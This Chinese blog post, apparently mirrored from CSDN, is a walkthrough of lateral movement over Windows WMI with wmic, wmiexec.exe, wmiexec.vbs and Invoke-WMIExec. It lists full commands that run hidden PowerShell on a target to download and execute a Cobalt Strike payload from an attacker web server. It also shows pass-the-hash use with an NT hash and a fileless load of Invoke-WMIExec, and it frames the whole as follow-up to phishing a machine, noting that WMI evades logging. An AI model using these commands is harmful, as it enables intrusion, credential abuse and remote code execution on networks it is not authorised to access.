首页 > 其他分享 >WMI横向

WMI横向

时间:2024-07-29 22:53:27浏览次数:7  
标签:exe wmiexec 横向 192.168 WMI wmic powershell

一.wmic

二.Wmiexec工具:

三.wmiexec.vbs工具

四.Invoke-WMIExec工具





WMI:

psexec被杀软禁用,WMI是一种新型的横向移动工具,本身的组织架构是数据库架构,在用WMI进行横向时,Windows操作系统不会将WMI的操作记录在日志中。

简单来说:wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode),WMI就是 WindowsManagement Instrumentation(Windows 管理规范)。它是 Windows 中的一个核心管理技术。

注意:

wmic命令需要本地管理员或域管理员才可以进行正常使用,普通权限用户若想要使用wmi,可以修改普通用户的ACL,不过修改用户的ACL管理员权也需要限,普通用户使用wmic。以下命令均在2008R2、2012R2、2016上进行测试,部分命令在虚拟机中测试不行。

一.wmic

利用:

先钓鱼上线目标机器

1、使用cs生成powershell脚本

2.wmic进行上线

我们将生成的脚本放在远程服务器上,开启http服务,确保能够远程下载

wmic /NODE:192.168.11.147 /user:administrator /password:Qq123456 PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))\""

3.成功上线:

二.Wmiexec工具:

wmiexec是一个即有全交互也有半交互的远程命令执行工具,有python版本的pe版本可运用于多种环 境,包括webshell环境、rdp环境、socks环境等

wmiexec.exe 域名/用户名:密码@目标IP   #哈希传递获得shell

wmiexec.exe 域名/用户名:密码@目标IP   "ipconfig"   #执行命令

wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP   #哈希传递获得shell

wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP "ipconfig"   #执行命令

利用:

先上传工具

一.利用powershell明文上线:

wmiexec.exe administrator:[email protected] "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))

2.上线

二.使用hash上线:

wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:05df2fd1109e3d3b60f110965f6af128 [email protected] "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))"

上线

三.wmiexec.vbs工具

wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。其可以在远程系统中执行命令并进行回显, 获取远程主机的半交互式Shell。wmiexec.vbs支持两种模式,一种是半交互式shell模式,另一种是执行 单条命令模式

使用powershell上线

cscript.exe //nologo wmiexec.vbs /cmd 192.168.11.147 administrator Qq123456 "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.11.128:9988/payload.ps1'))"

成功上线

四.Invoke-WMIExec工具

1.用法如下

Invoke-WMIExec -Target IP -Domain 域 -Username 用户 -Hash hash-Command "calc.exe" -verbose

2.采用无文件落地的方式进行横向

shell powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.11.128:9988/Invoke-WMIExec.ps1');import-module .\Invoke-WMIExec.ps1;Invoke-WMIExec -Target 192.168.11.147 -Username administrator -Hash 05df2fd1109e3d3b60f110965f6af128 -Command "whoami" -verbose

执行成功

标签:exe,wmiexec,横向,192.168,WMI,wmic,powershell
From: https://blog.csdn.net/2301_80116443/article/details/140774421

相关文章

  • ListBox横向排布Item
    <Windowx:Class="TwoColumnListBox.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mi......
  • 自动驾驶系列—智能巡航辅助功能中的横向避让功能介绍
    文章目录1.背景介绍2.功能定义3.功能原理4.传感器架构5.实际应用案例5.1典型场景1:前方车辆压线5.2典型场景2:相邻车道有大型车辆5.3典型场景3:它车近距离cutin6.总结与展望1.背景介绍随着汽车技术的发展,智能巡航辅助系统成为了现代车辆的一项重要功能。智......
  • 在 PowerShell 中Get-WmiObject Win32_PhysicalMemory,SMBIOSMemoryType 是一种用于描
    在PowerShell中Get-WmiObjectWin32_PhysicalMemory,SMBIOSMemoryType是一种用于描述系统中物理内存类型的属性。数字26表示特定的内存类型,具体为DDR4内存。每种内存类型在SMBIOS(SystemManagementBIOS)规范中都有一个对应的数字码,用来标识不同类型的内存。以下是一些常见......
  • Intel Management Engine WMI Provider 2408.5.4.0 20240221 驱动程序 Intel管理引擎
    驱动程序"IntelManagementEngineWMIProvider2408.5.4.0"是指Intel管理引擎的一部分,它通过Windows管理仪表(WMI)提供对管理引擎功能的访问和管理。这些驱动程序通常用于管理和配置Intel管理引擎的功能,包括安全功能、远程访问以及系统监控等。如果您需要安装或更新这个驱......
  • 工作常用的EXCEL公式 | 横向汇总统计
    需求:统计汇总,按日期横向统计工作时长需求如下: 解决方法:1、在源数据表格添加一列辅助列,C2单元格=A2&INT(MID(B2,7,2))先用MID函数,提取日,然后INT函数取整,再拼接姓名字段 2、在汇总表格输入公式:IFERROR(VLOOKUP($A2&B$1,Sheet1!$C$1:$D$36,2,0),"")这个公式表示先将姓名和......
  • 硬核丨2024文本生成类AI产品横向评测报告
    文本生成/写作”作为使用最高频的AI场景,各类产品如雨后春笋般出现。我们针对办公/学习的写作场景进行了全面系统的评测。希望此次评测结论能够帮您在工作学习中使用AI应用提效。本次评测对象包含文心、通义、kimi等模型厂商及笔灵、迅捷、秘塔等应用厂商共13款产品,评测内容包......
  • 域渗透之利用WMI来横向渗透
    目录前言wmi介绍wmiexec和psexec的区别wmic命令执行wmiexec.vbswmiexec.pyInvoke-WmiCommand.ps1前言上一篇打红日靶场拿域控是用ms17-010漏洞执行命令的方式,最后提到了wmi利用的方式。接下来我将继续采用之前的红日靶场环境,只保留web服务器和域控,使用wmiexec尝试拿下域控制器。......
  • 红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务
    红队内网攻防渗透1.内网横向移动1.1横向移动入口知识点1.1.1、当前被控机处于域内还是域外1.1.1.1在域内1.1.1.2不在域内1.1.1.2.1第一种方法提权到system权限1.1.1.2.2第二种方法切换用户上线1.1.1.2.3kerbrute枚举用户1.1.2、当前凭据为明......
  • 红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&I
    红队内网攻防渗透1.内网横向移动1.1WMI进行横向移动1.1.1利用条件:1.1.1利用详情1.1.1.1wmic1.1.1.1.1正向shell上线1.1.1.1.2反向shell上线1.1.1.2cscript(不建议使用)1.1.1.3wmiexec-impacket1.1.1.4cs插件1.2SMB横向移动1.2.1利......
  • 横向LQR、纵向PID控制进行轨迹跟踪以及python实现
    横向LQR、纵向PID控制进行轨迹跟踪以及python实现附赠自动驾驶最全的学习资料和量产经验:链接一、LQR问题模型建立:理论部分比较成熟,这里只介绍demo所使用的建模方程:使用离散代数黎卡提方程求解系统状态矩阵:输入矩阵:A矩阵:B矩阵:二、代码实现#导入相关包imp......